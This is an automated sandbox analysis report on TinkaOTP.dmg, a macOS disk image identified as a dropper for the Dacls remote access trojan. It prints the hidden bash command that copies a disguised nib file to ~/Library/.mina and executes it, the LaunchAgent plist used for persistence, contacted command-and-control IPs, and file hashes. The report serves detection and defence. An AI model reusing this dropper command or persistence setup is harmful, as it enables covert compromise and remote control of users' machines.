Loading ...

Play interactive tourEdit tour

Analysis Report TinkaOTP.dmg

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:101851
Start date:06.05.2020
Start time:15:15:39
Joe Sandbox Product:Cloud
Overall analysis duration:0h 3m 38s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:TinkaOTP.dmg
Cookbook file name:defaultmacfilecookbook.jbs
Analysis system description:Mac Mini, Mojave (Java JDK 11.0.4, Adobe Reader 2019.012.20034, Flash 32.0.0.223)
Run name:Potential for more IOCs and behavior
Detection:MAL
Classification:mal60.troj.evad.macDMG@0/4@0/0

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold600 - 100Report FP / FNfalse
Dacls
malicious

Classification Spiderchart

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting1Hidden Files and Directories21Launch Daemon1Masquerading1Credential DumpingSystem Information Discovery51Application Deployment SoftwareData from Local SystemData CompressedStandard Cryptographic Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaService ExecutionLaunch Daemon1Plist Modification1Hidden Files and Directories21Network SniffingApplication Window DiscoveryRemote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesWindows Management InstrumentationLC_LOAD_DYLIB Addition1Path InterceptionScripting1Input CaptureQuery RegistryWindows Remote ManagementData from Network Shared DriveAutomated ExfiltrationCustom Cryptographic ProtocolExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskPlist Modification1DLL Search Order HijackingPlist Modification1Credentials in FilesSystem Network Configuration DiscoveryLogon ScriptsInput CaptureData EncryptedMultiband CommunicationSIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceLaunch Agent2File System Permissions WeaknessMasqueradingAccount ManipulationRemote System DiscoveryShared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings

Signature Overview

Click to jump to signature section


Networking:

barindex
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknownTCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknownTCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknownTCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknownTCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknownTCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknownTCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknownTCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknownTCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknownTCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknownTCP traffic detected without corresponding DNS query: 185.62.58.207
Urls found in memory or binary dataShow sources
Source: TinkaOTP.dmgString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49375 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49379
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49375
Source: unknownNetwork traffic detected: HTTP traffic on port 49379 -> 443

System Summary:

barindex
Classification labelShow sources
Source: classification engineClassification label: mal60.troj.evad.macDMG@0/4@0/0

Persistence and Installation Behavior:

barindex
Executes hidden filesShow sources
Source: /bin/bash (PID: 18267)Hidden file executed: /Users/ben/Library/.mina /Users/ben/Library/.minaJump to behavior
Writes Mach-O files to untypical directoriesShow sources
Source: /bin/cp (PID: 18265)64-bit Mach-O written to unusual path: /Users/ben/Library/.minaJump to dropped file
Changes permissions of written Mach-O filesShow sources
Source: /bin/cp (PID: 18265)Permissions modified for written 64-bit Mach-O /Users/ben/Library/.mina: bits: - usr: r grp: r all: rwJump to dropped file
Creates hidden files, links and/or directoriesShow sources
Source: /bin/cp (PID: 18265)Hidden File created: /Users/ben/Library/.minaJump to behavior
Executes commands using a shell command-line interpreterShow sources
Source: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP (PID: 18263)Shell command executed: /bin/bash -c cp /Volumes/TinkaOTP/TinkaOTP.app/Contents/Resources/Base.lproj/SubMenu.nib ~/Library/.mina > /dev/null 2>&1 && chmod +x ~/Library/.mina > /dev/null 2>&1 && ~/Library/.mina > /dev/null 2>&1Jump to behavior
Executes the "chmod" command used to modify permissionsShow sources
Source: /bin/bash (PID: 18266)Chmod executable: /bin/chmod -> chmod +x /Users/ben/Library/.minaJump to behavior
Reads launchservices plist filesShow sources
Source: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP (PID: 18263)Launchservices plist file read: /Users/ben/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Reads user launchservices plist file containing default apps for corresponding file typesShow sources
Source: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP (PID: 18263)Preferences launchservices plist file read: /Users/ben/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Writes 64-bit Mach-O files to diskShow sources
Source: /bin/cp (PID: 18265)File written: /Users/ben/Library/.minaJump to dropped file
Reads data from the local random generatorShow sources
Source: /Users/ben/Library/.mina (PID: 18268)Random device file read: /dev/urandomJump to behavior
Uses AppleKeyboardLayouts bundle containing keyboard layoutsShow sources
Source: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP (PID: 18263)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
Writes property list (.plist) files to diskShow sources
Source: /Users/ben/Library/.mina (PID: 18267)XML plist file created: /Users/ben/Library/LaunchAgents/com.aex-loop.agent.plistJump to dropped file

Boot Survival:

barindex
Creates memory-persistent launch servicesShow sources
Source: /Users/ben/Library/.mina (PID: 18267)Launch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /Users/ben/Library/LaunchAgents/com.aex-loop.agent.plistJump to behavior
Creates user-wide 'launchd' managed services aka launch agentsShow sources
Source: /Users/ben/Library/.mina (PID: 18267)Launch agent created File created: /Users/ben/Library/LaunchAgents/com.aex-loop.agent.plistJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Creates hidden Mach-O filesShow sources
Source: /bin/cp (PID: 18265)Hidden Mach-O file written: Mach-O 64 bit: /Users/ben/Library/.minaJump to dropped file

HIPS / PFW / Operating System Protection Evasion:

barindex
Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)Show sources
Source: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP (PID: 18263)Sysctl read request: kern.safeboot (1.66)Jump to behavior

Language, Device and Operating System Detection:

barindex
Reads hardware related sysctl valuesShow sources
Source: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP (PID: 18263)Sysctl read request: hw.availcpu (6.25)Jump to behavior
Reads the systems hostnameShow sources
Source: /bin/bash (PID: 18264)Sysctl requested: kern.hostname (1.10)Jump to behavior
Reads the system or server version plist fileShow sources
Source: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP (PID: 18263)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Dacls RATShow sources
Source: Yara matchFile source: SubMenu.nib, type: SAMPLE
Source: Yara matchFile source: /Users/ben/Library/.mina, type: DROPPED

Remote Access Functionality:

barindex
Yara detected Dacls RATShow sources
Source: Yara matchFile source: SubMenu.nib, type: SAMPLE
Source: Yara matchFile source: /Users/ben/Library/.mina, type: DROPPED

Malware Configuration

No configs have been found

Signature Similarity

Sample Distance (10 = nearest)
10 9 8 7 6 5 4 3 2 1
Samplename Analysis ID SHA256 Similarity


Runtime Messages

Command:open "/Volumes/TinkaOTP/TinkaOTP.app" --args
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Shell
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 101851 Sample: TinkaOTP.dmg Startdate: 06/05/2020 Architecture: MAC Score: 60 25 185.62.58.207, 443, 49379 unknown Netherlands 2->25 27 67.43.239.146, 443, 49375 unknown Canada 2->27 29 Yara detected Dacls RAT 2->29 9 xpcproxy TinkaOTP 2->9         started        signatures3 process4 process5 11 bash 9->11         started        process6 13 bash cp 1 11->13         started        17 bash .mina 1 11->17         started        19 bash chmod 11->19         started        file7 23 /Users/ben/Library/.mina, Mach-O 13->23 dropped 31 Creates hidden Mach-O files 13->31 33 Writes Mach-O files to untypical directories 13->33 35 Executes hidden files 17->35 21 .mina 1 17->21         started        signatures8 process9

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
SubMenu.nibJoeSecurity_DaclsYara detected Dacls RATJoe Security

    PCAP (Network Traffic)

    No yara matches

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    /Users/ben/Library/.minaJoeSecurity_DaclsYara detected Dacls RATJoe Security

      Sigma Overview

      No Sigma rule has matched

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      unknownhttps://t.co/y27Kr7Z7wXGet hashmaliciousBrowse
      • 104.244.42.133
      https://linkprotect.cudasvc.com/url?a=%68%74%74%70%73%3A%2F%2F%74%2E%63%6F%2F%4E%76%38%72%49%30%32%5A%45%4F&c=EGet hashmaliciousBrowse
      • 104.244.42.69
      https://f002.backblazeb2.com/file/wyl2ruk25cvbtv9xps81of/e56dfiimp/z0etj6poadf9y2sev602k0.html?email=undefine#abosschaart@pzem.nlGet hashmaliciousBrowse
      • 192.229.221.185
      oBfsC4t10n2.xlsGet hashmaliciousBrowse
      • 52.114.77.164
      https://peenni.xyz/Admin/login.php?email=nadia.abbassi@swisslife.fr&name=%20ABBASSI%20NadiaGet hashmaliciousBrowse
      • 148.72.65.62
      Documentation.xlsGet hashmaliciousBrowse
      • 185.140.53.48
      Documentation.xlsGet hashmaliciousBrowse
      • 104.18.48.20
      Eventbot.jarGet hashmaliciousBrowse
      • 74.125.143.188
      jazz.exeGet hashmaliciousBrowse
      • 1.3.99.0
      #Ud83d#UdcdeAeriestechnology.com Audio_4544.htmGet hashmaliciousBrowse
      • 23.111.9.35
      SWIFT.exeGet hashmaliciousBrowse
      • 185.140.53.158
      Aeriestechnology.com #Ud83d#UdcdeAudio_4544.htmGet hashmaliciousBrowse
      • 180.150.250.218
      http://chng.it/nQRBfpjZD7Get hashmaliciousBrowse
      • 35.186.220.184
      https://us8.campaign-archive.com/?u=03a536b6064301f5b9e56a1a5&id=a70d4c614eGet hashmaliciousBrowse
      • 151.101.60.193
      https://estilomagnolia.com.ar/COVID-19.htmlGet hashmaliciousBrowse
      • 192.185.188.168
      ace-stream-3-1-1-multi-win.exeGet hashmaliciousBrowse
      • 138.201.84.72
      http://woogle.com/Get hashmaliciousBrowse
      • 192.161.187.200
      https://xurl.es/bz56kGet hashmaliciousBrowse
      • 104.16.132.229
      https://h8.t.hubspotemail.net/e2t/c/*W7HmM9G14pJ7vN919GD-s5dBr0/*W2_cz8f7Rk0N3W1Fc8Qv3D1Q0k0/5/f18dQhb0S9r79jx7M-W4GcZlG2wqbgQW4VSVT16bzZrwVRqVDC64DbVMW4NfVNZ9gpw4MW4PfvXg7v1hvYW7NyyjW8mv-3QW8mQCxy79mDVRV5Gp8s83GbYkW8hGL-k9bVLmzW7sLthR9djgzWW5LMnrb2c2bg7W79-X3K8gvx_4W6YmB6S7JtTqnW8mnw907bjnYCW3m1z8F8h6MtRW5mK37h1h4tZfW6s1-1C3SQgn2W3_CV247WvZcbW41TlcR3Tw-1xW3DrmCK2r5Kr4W2HT8mr6kn_xzMz74JcYSX-5W7m_B1R5c8d-SW3788pM7mNTCXW3Kh5V35QKjhhW3fFMTv8djpxyW9j8Kdg96NrfmW4FxPX82_GnqFW7c9wJr2JxmcrW4LQhN49hxfTXN5tRRv9cyhfHW3s3_hw87Z8vpW37Fssp5vfyNnW8R6rGC6cb1QjW3sBXv68yxkN1W49kJ936fMryTN11rnNb4VjkzW6Mzk0P8pPvtYV1T_l07TncnMW31GHfx12y5tcW5QHPjY7f1VhbVb5y-_27k6TlW1jVk8n2LKhTNN3Z1mnX9XfwsD7s2GRzp-nf2KWKpv03Get hashmaliciousBrowse
      • 13.224.197.9
      https://1drv.ms/b/s!Arr0ZL_iF4eIkzIyxU6TJfnJdfLL?e=qoUvoJGet hashmaliciousBrowse
      • 172.217.168.66
      unknownhttps://t.co/y27Kr7Z7wXGet hashmaliciousBrowse
      • 104.244.42.133
      https://linkprotect.cudasvc.com/url?a=%68%74%74%70%73%3A%2F%2F%74%2E%63%6F%2F%4E%76%38%72%49%30%32%5A%45%4F&c=EGet hashmaliciousBrowse
      • 104.244.42.69
      https://f002.backblazeb2.com/file/wyl2ruk25cvbtv9xps81of/e56dfiimp/z0etj6poadf9y2sev602k0.html?email=undefine#abosschaart@pzem.nlGet hashmaliciousBrowse
      • 192.229.221.185
      oBfsC4t10n2.xlsGet hashmaliciousBrowse
      • 52.114.77.164
      https://peenni.xyz/Admin/login.php?email=nadia.abbassi@swisslife.fr&name=%20ABBASSI%20NadiaGet hashmaliciousBrowse
      • 148.72.65.62
      Documentation.xlsGet hashmaliciousBrowse
      • 185.140.53.48
      Documentation.xlsGet hashmaliciousBrowse
      • 104.18.48.20
      Eventbot.jarGet hashmaliciousBrowse
      • 74.125.143.188
      jazz.exeGet hashmaliciousBrowse
      • 1.3.99.0
      #Ud83d#UdcdeAeriestechnology.com Audio_4544.htmGet hashmaliciousBrowse
      • 23.111.9.35
      SWIFT.exeGet hashmaliciousBrowse
      • 185.140.53.158
      Aeriestechnology.com #Ud83d#UdcdeAudio_4544.htmGet hashmaliciousBrowse
      • 180.150.250.218
      http://chng.it/nQRBfpjZD7Get hashmaliciousBrowse
      • 35.186.220.184
      https://us8.campaign-archive.com/?u=03a536b6064301f5b9e56a1a5&id=a70d4c614eGet hashmaliciousBrowse
      • 151.101.60.193
      https://estilomagnolia.com.ar/COVID-19.htmlGet hashmaliciousBrowse
      • 192.185.188.168
      ace-stream-3-1-1-multi-win.exeGet hashmaliciousBrowse
      • 138.201.84.72
      http://woogle.com/Get hashmaliciousBrowse
      • 192.161.187.200
      https://xurl.es/bz56kGet hashmaliciousBrowse
      • 104.16.132.229
      https://h8.t.hubspotemail.net/e2t/c/*W7HmM9G14pJ7vN919GD-s5dBr0/*W2_cz8f7Rk0N3W1Fc8Qv3D1Q0k0/5/f18dQhb0S9r79jx7M-W4GcZlG2wqbgQW4VSVT16bzZrwVRqVDC64DbVMW4NfVNZ9gpw4MW4PfvXg7v1hvYW7NyyjW8mv-3QW8mQCxy79mDVRV5Gp8s83GbYkW8hGL-k9bVLmzW7sLthR9djgzWW5LMnrb2c2bg7W79-X3K8gvx_4W6YmB6S7JtTqnW8mnw907bjnYCW3m1z8F8h6MtRW5mK37h1h4tZfW6s1-1C3SQgn2W3_CV247WvZcbW41TlcR3Tw-1xW3DrmCK2r5Kr4W2HT8mr6kn_xzMz74JcYSX-5W7m_B1R5c8d-SW3788pM7mNTCXW3Kh5V35QKjhhW3fFMTv8djpxyW9j8Kdg96NrfmW4FxPX82_GnqFW7c9wJr2JxmcrW4LQhN49hxfTXN5tRRv9cyhfHW3s3_hw87Z8vpW37Fssp5vfyNnW8R6rGC6cb1QjW3sBXv68yxkN1W49kJ936fMryTN11rnNb4VjkzW6Mzk0P8pPvtYV1T_l07TncnMW31GHfx12y5tcW5QHPjY7f1VhbVb5y-_27k6TlW1jVk8n2LKhTNN3Z1mnX9XfwsD7s2GRzp-nf2KWKpv03Get hashmaliciousBrowse
      • 13.224.197.9
      https://1drv.ms/b/s!Arr0ZL_iF4eIkzIyxU6TJfnJdfLL?e=qoUvoJGet hashmaliciousBrowse
      • 172.217.168.66

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      No Antivirus matches

      Dropped Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      cam-macmac-stand

      Startup

      • system is mac-mojave
      • xpcproxy New Fork (PID: 18263, Parent: 1)
      • TinkaOTP (MD5: 02670c82d74d0362a5fafdf3f42904ef) Arguments: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP
        • bash New Fork (PID: 18264, Parent: 18263)
          • bash New Fork (PID: 18265, Parent: 18264)
          • cp (MD5: b78b44666e242cb82db43e70116add92) Arguments: cp /Volumes/TinkaOTP/TinkaOTP.app/Contents/Resources/Base.lproj/SubMenu.nib /Users/ben/Library/.mina
          • bash New Fork (PID: 18266, Parent: 18264)
          • chmod (MD5: d7df83ea3a49de5d07e0c1730e910852) Arguments: chmod +x /Users/ben/Library/.mina
          • bash New Fork (PID: 18267, Parent: 18264)
          • .mina (MD5: f05437d510287448325bac98a1378de1) Arguments: /Users/ben/Library/.mina
            • .mina New Fork (PID: 18268, Parent: 18267)
      • cleanup

      Created / dropped Files

      /Users/ben/Library/.mina
      Process:/bin/cp
      File Type:Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL|PIE>
      Size (bytes):673092
      Entropy (8bit):6.231249849549832
      Encrypted:false
      MD5:F05437D510287448325BAC98A1378DE1
      SHA1:FA3DEB60B8A2EAA29A7DCCF14BEE6ADAE81F442F
      SHA-256:846D8647D27A0D729DF40B13A644F3BFFDC95F6D0E600F2195C85628D59F1DC6
      SHA-512:466999585E7B09E729DEF6E13C719B656BA7EE9CA43EA32C8FB3A6177DE81A75CAF9BD5EB0C0AC172C2B7FEA3C1AA57D10349FF98AAC472FE2FFAFDE8CD30165
      Malicious:true
      Yara Hits:
      • Rule: JoeSecurity_Dacls, Description: Yara detected Dacls RAT, Source: /Users/ben/Library/.mina, Author: Joe Security
      Reputation:low
      Preview: ....................h..... .........H...__PAGEZERO..............................................................__TEXT..........................................................__text..........__TEXT..........@.......x~......@...............................__stubs.........__TEXT..........................................................__stub_helper...__TEXT..........d...............d...............................__const.........__TEXT.................dA.....................................__cstring.......__TEXT..........T........e......T...............................__ustring.......__TEXT..........V<..............V<..............................__unwind_info...__TEXT..........T=..............T=..............................__eh_frame......__TEXT..........hk.......T......hk......................................__DATA_CONST............. ............... ......................__got...........__DATA_CONST............H...........................r...........__const.........__DATA_CONST....
      /Users/ben/Library/Caches/com.apple.appstore.db
      Process:/Users/ben/Library/.mina
      File Type:data
      Size (bytes):109164
      Entropy (8bit):7.998274026308568
      Encrypted:true
      MD5:7D8B6456DC5E20AC49C280B784C085D1
      SHA1:D95B70DBE4BF55C9CEE6C433FD59187046C1011F
      SHA-256:8074471BCF8DAD702F5E0E7D7D112AD08D133E97A64D5CD97AD251AFE5DCE6A2
      SHA-512:C51E874A7986B467D7E01DC1891F01D21B3472AB5E442E1BA4D7D3754BEBF5DB7532C2D2FDF82C785AE424ACE40D14238023011D75F79BAB758EB8F9EAF1D59D
      Malicious:false
      Reputation:low
      Preview: >.a..<r6].y.2m.b.u4..Y.b...L$....Y.4CQe......^y=u".E.S.#....!R.i...k....].z.A..X,.'....v....h._l.y.h..LgS....)../..h.c.1.V....d......-3...+....1.y.f..7.u.Y.E.CH.o...u.+..'.Z.....@..YG.uy.A.u0..."......tf.q..&puJS..m...5"<...[.....L..R])......kL..[.."R..x(..!...x.(u..."...n5...........k.D.....(..B...8a:r.m........U....-...b...P9..Hp4.7..eL6~.....276-..z..=....w"yW....i.O`wqF<$.>..h{s.....I..E@!;]..c....)r.....R...0Vo..`(%......,...).......8j..v...NQ.f1|.....=Q.....L.d.L:j[...UI.c.H...7pd....z_f.Y.u..[..Mv..9.&.uA.Af.8....e..........sx....D.`.Gr..}.... .....K%**[...q..:~....^..r%".d.k..i.v.)oF........I%4.0.\.....]:....A.W....'4.$..&..Y.*_....^m..xsB..B......,9.D..xX`..%wd....[l..$C;.T*.ac:uM..L..(H..G..].0..'...w.....|....<.]..~.g.E..M*i.A.o.m...r..O..}.....;).^.]q1w.Xj:q.....Q%..!.A......Z........n'...u...".....).'.2..y.NKy...ZBF.;.O9.xQgzy..c.b..W..m....g.!.f..5.C.$.b.VC...l....)M.B-.8..\.....S.c..G.)....,..e.Xd.C.$"...@...
      /Users/ben/Library/LaunchAgents/com.aex-loop.agent.plist
      Process:/Users/ben/Library/.mina
      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
      Size (bytes):439
      Entropy (8bit):5.230362728676761
      Encrypted:false
      MD5:5E7247AA69F17909F527D4871234F16B
      SHA1:E50DECA8D0FD1B36620477CD8C1DC6C23836C566
      SHA-256:5012C40ED7D3CE78A0759618FC7AD675CC19FF4A1460CE7B60F27BA85D366E5D
      SHA-512:D49E5F3FAAA9893A69F5CB5B37D9CEC6AC4A67F546B6764940BF94936509EEA0312268AB10BA8B36E0DF0BB0E994A06BAE40687EBBF87FB406D328BCCCD05F15
      Malicious:false
      Reputation:low
      Preview: <?xml version="1.0" encoding="UTF-8"?>..<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">..<plist version="1.0">..<dict>...<key>Label</key>...<string>com.aex-loop.agent</string>...<key>ProgramArguments</key>...<array>....<string>/Users/ben/Library/.mina</string>....<string>daemon</string>...</array>...<key>KeepAlive</key>...<false/>...<key>RunAtLoad</key>...<true/>..</dict>..</plist>
      /dev/null
      Process:/Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP
      File Type:ASCII text
      Size (bytes):66
      Entropy (8bit):4.864480437829257
      Encrypted:false
      MD5:765D5321E46F1D94AB56E6712713C78E
      SHA1:F7DCEE7B667AC451A5D9A29FF013A2F6C24AAE44
      SHA-256:47263C3026CA7E650DFFC8D27112A3580B97EC52BC332B86E741D6E9D116B797
      SHA-512:C3B9E8657A1FBBA24656DB7C676F22D137A91D0C328D8EA765401F58D58CB954EFBFD79873C55D091D30CC124D96B92E0BC19B76D3C5CC61526A1A1A1DA15855
      Malicious:false
      Reputation:low
      Preview: 2020-05-06 17:16:24.059 TinkaOTP[18263:77471] ApplePersistence=NO.

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPCountryFlagASNASN NameMalicious
      185.62.58.207
      Netherlands
      62370unknownfalse
      67.43.239.146
      Canada
      36666unknownfalse

      Static File Info

      General

      File type:zlib compressed data
      Entropy (8bit):7.994558906989309
      TrID:
      • Disk Image (Macintosh), zlib, GPT (10001/1) 90.90%
      • XMill compressed XML (1001/1) 9.10%
      File name:TinkaOTP.dmg
      File size:6462928
      MD5:81f8f0526740b55fe484c42126cd8396
      SHA1:fe83d95afce63e935dbe22aef40a164cee34f4e5
      SHA256:899e66ede95686a06394f707dd09b7c29af68f95d22136f0a023bfd01390ad53
      SHA512:751c2195a47d5e263ccfb860037ce32b5bc3c9ca516b9806a0cf1bae2af9742bcc3c9965218fd938e6c3eaa5a90081ece877aeec56f667477686daa3aeb6d77a
      SSDEEP:196608:py41rDVac5C/ohoS4AOPqIsuaB8jA5yqTZb:py4xD4HBASqIsBF
      File Content Preview:x...!........&..h...h....... x...3X....=<...(...../..&.,&..-."..|^F.......Yy~...A..;uO.u..g..'...J.;... @....... @....... @....... @....... @....... @....... @....... @......uH..x.su.T.p..a``d.a``X....H.y.`7.B+A..P~....U<....<.4.....*...A.^..4 5..y......5

      Network Behavior

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      May 6, 2020 15:16:25.420222998 CEST49375443192.168.0.5167.43.239.146
      May 6, 2020 15:16:25.520539045 CEST4434937567.43.239.146192.168.0.51
      May 6, 2020 15:16:25.520975113 CEST49375443192.168.0.5167.43.239.146
      May 6, 2020 15:16:25.521297932 CEST49375443192.168.0.5167.43.239.146
      May 6, 2020 15:16:25.634637117 CEST4434937567.43.239.146192.168.0.51
      May 6, 2020 15:16:25.634663105 CEST4434937567.43.239.146192.168.0.51
      May 6, 2020 15:16:25.635191917 CEST49375443192.168.0.5167.43.239.146
      May 6, 2020 15:16:25.646831036 CEST49375443192.168.0.5167.43.239.146
      May 6, 2020 15:16:25.805166960 CEST4434937567.43.239.146192.168.0.51
      May 6, 2020 15:16:25.805373907 CEST49375443192.168.0.5167.43.239.146
      May 6, 2020 15:16:25.905936003 CEST4434937567.43.239.146192.168.0.51
      May 6, 2020 15:16:25.906196117 CEST49375443192.168.0.5167.43.239.146
      May 6, 2020 15:16:25.906235933 CEST49375443192.168.0.5167.43.239.146
      May 6, 2020 15:16:26.281728983 CEST49375443192.168.0.5167.43.239.146
      May 6, 2020 15:16:26.382430077 CEST4434937567.43.239.146192.168.0.51
      May 6, 2020 15:16:26.914593935 CEST4434937567.43.239.146192.168.0.51
      May 6, 2020 15:16:26.915062904 CEST49375443192.168.0.5167.43.239.146
      May 6, 2020 15:16:26.915129900 CEST49375443192.168.0.5167.43.239.146
      May 6, 2020 15:16:28.582882881 CEST49375443192.168.0.5167.43.239.146
      May 6, 2020 15:16:28.683532000 CEST4434937567.43.239.146192.168.0.51
      May 6, 2020 15:17:41.155874968 CEST4434937567.43.239.146192.168.0.51
      May 6, 2020 15:17:41.156137943 CEST49375443192.168.0.5167.43.239.146
      May 6, 2020 15:17:41.156182051 CEST49375443192.168.0.5167.43.239.146
      May 6, 2020 15:17:41.156224966 CEST49375443192.168.0.5167.43.239.146
      May 6, 2020 15:17:41.269670010 CEST4434937567.43.239.146192.168.0.51
      May 6, 2020 15:17:41.279517889 CEST4434937567.43.239.146192.168.0.51
      May 6, 2020 15:17:51.189356089 CEST49379443192.168.0.51185.62.58.207
      May 6, 2020 15:17:51.234394073 CEST44349379185.62.58.207192.168.0.51
      May 6, 2020 15:17:51.234823942 CEST49379443192.168.0.51185.62.58.207
      May 6, 2020 15:17:51.235049963 CEST49379443192.168.0.51185.62.58.207
      May 6, 2020 15:17:51.270240068 CEST44349379185.62.58.207192.168.0.51
      May 6, 2020 15:17:51.270263910 CEST44349379185.62.58.207192.168.0.51
      May 6, 2020 15:17:51.270637035 CEST49379443192.168.0.51185.62.58.207
      May 6, 2020 15:17:51.281897068 CEST49379443192.168.0.51185.62.58.207
      May 6, 2020 15:17:51.306356907 CEST44349379185.62.58.207192.168.0.51
      May 6, 2020 15:17:51.306710005 CEST49379443192.168.0.51185.62.58.207
      May 6, 2020 15:17:51.322312117 CEST44349379185.62.58.207192.168.0.51
      May 6, 2020 15:17:51.322710991 CEST49379443192.168.0.51185.62.58.207
      May 6, 2020 15:17:51.322791100 CEST49379443192.168.0.51185.62.58.207
      May 6, 2020 15:17:51.338289976 CEST44349379185.62.58.207192.168.0.51
      May 6, 2020 15:17:51.338706970 CEST49379443192.168.0.51185.62.58.207
      May 6, 2020 15:17:51.338766098 CEST49379443192.168.0.51185.62.58.207
      May 6, 2020 15:17:51.368772030 CEST44349379185.62.58.207192.168.0.51
      May 6, 2020 15:17:51.369188070 CEST49379443192.168.0.51185.62.58.207
      May 6, 2020 15:17:51.399929047 CEST44349379185.62.58.207192.168.0.51

      HTTPS Packets

      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
      May 6, 2020 15:16:25.634637117 CEST67.43.239.146443192.168.0.5149375CN=uxusbtddbwgsz.org, OU=ZHL Co. Ltd, O=JLR Co. Ltd, L=Sampson, ST=Peoria, C=USCN=uxusbtddbwgsz.org, OU=ZHL Co. Ltd, O=JLR Co. Ltd, L=Sampson, ST=Peoria, C=USSat Mar 21 06:44:21 CET 2020Tue Mar 19 06:44:21 CET 2030771,49196-49195-49200-49199-159-158-52393-52392-52394-49191-49187-49192-49188-49162-49161-49172-49171-107-103-57-51-52244-52243-52245,13-11-10-23,25-24-23-21-19-16,0f8c52bdcd6feb46ef8a6d31d73ab457f
